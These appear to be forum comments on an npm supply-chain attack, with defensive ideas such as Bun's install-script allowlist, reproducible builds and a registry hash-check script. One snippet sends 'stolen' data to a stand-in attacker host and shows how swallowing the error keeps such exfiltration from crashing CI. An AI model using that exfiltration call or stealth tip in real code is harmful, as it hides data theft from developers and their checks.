Many packages will have over 100 dependencies if you include the dev dependencies, so you can easily break 1,000.
They thought they'd be the cool kids by supporting multiple versions, and that the old way of doing packaging, like Debian and co. where everyone is expected to use the same version, was the legacy fart way of doing things.
It's just that developers back then were engineers first, and so designed things well, specifically to avoid this situation of dependency hell and supply-chain injection. But the web dev crowd decided to do "better", and now the old problems are back as new problems...
Smart developers spend their time working on original code rather than reinventing the wheel.
I noticed Bun doesn't run install scripts by default unless you whitelist them.
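A minimal sketch of that allowlist, if I remember Bun's behavior right: dependency lifecycle scripts (postinstall and friends) are skipped unless the package is named in package.json's trustedDependencies field. The package name here is a placeholder:

    {
      "name": "my-app",
      "dependencies": { "some-native-addon": "^2.0.0" },
      "trustedDependencies": ["some-native-addon"]
    }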
Interestingly, if this is happening in a long-running process and the exploit server is offline, the promise from the fetch will reject. And the default behavior for unhandled promise rejections in modern Node is to crash the process.
So if anybody had tested this version of the library in an air-gapped environment, it would have crashed and failed in CI.
The attacker should have silenced the error with a .catch(_ => {}).
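A minimal repro of that failure mode, assuming Node 18+ (global fetch, and unhandled rejections fatal by default since Node 15); the hostname is a placeholder on the reserved .invalid TLD so the request is guaranteed to fail:

    // Exfil call as the malware wrote it: if the host is unreachable,
    // the returned promise rejects with no handler attached...
    fetch("http://attacker.invalid/exfil", { method: "POST", body: "stolen" });
    // ...and Node's default --unhandled-rejections=throw mode crashes
    // the process, which is exactly what a CI run would surface.

    // The quiet version: swallow the network error.
    fetch("http://attacker.invalid/exfil", { method: "POST", body: "stolen" })
      .catch(_ => {}); // never rejects unhandled, never crashes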
Honestly, it's time for the npm ecosystem to move to a model where only build agents running on npm's own infrastructure can upload binary artifacts, or to mandate reproducible builds (sketched below).
And for a select set of highly used packages, someone at npm should be paid to review each release's changeset.
Both would have massively impeded the attacker.
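To make the reproducible-builds idea concrete, a sketch of the check a registry (or anyone) could run, assuming Node 18+ for global fetch. The package name, version, and tarball path are placeholders passed on the command line, and real reproducibility would additionally need pinned toolchains and normalized archive timestamps:

    // reproduce-check.js: compare a locally rebuilt tarball (from `npm pack`
    // in the package's source checkout) against the sha512 integrity hash
    // the npm registry recorded for the published artifact.
    const { createHash } = require("crypto");
    const { readFileSync } = require("fs");

    async function main() {
      // Placeholders: node reproduce-check.js <pkg> <version> <tarball>
      const [pkg, version, tarballPath] = process.argv.slice(2);

      // Registry metadata carries an SRI "sha512-..." string per version
      // (older packages may only have a sha1 shasum).
      const meta = await (await fetch(`https://registry.npmjs.org/${pkg}`)).json();
      const published = meta.versions[version].dist.integrity;

      // Hash the local build the same way: sha512, base64-encoded.
      const digest = createHash("sha512").update(readFileSync(tarballPath)).digest("base64");
      const local = `sha512-${digest}`;

      console.log(published === local
        ? "MATCH: local build reproduces the published artifact"
        : "MISMATCH: published artifact differs from source build");
    }

    main().catch(err => { console.error(err); process.exit(1); });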
It will be interesting to explore how the project got compromised and how the malicious packages were published to the registry.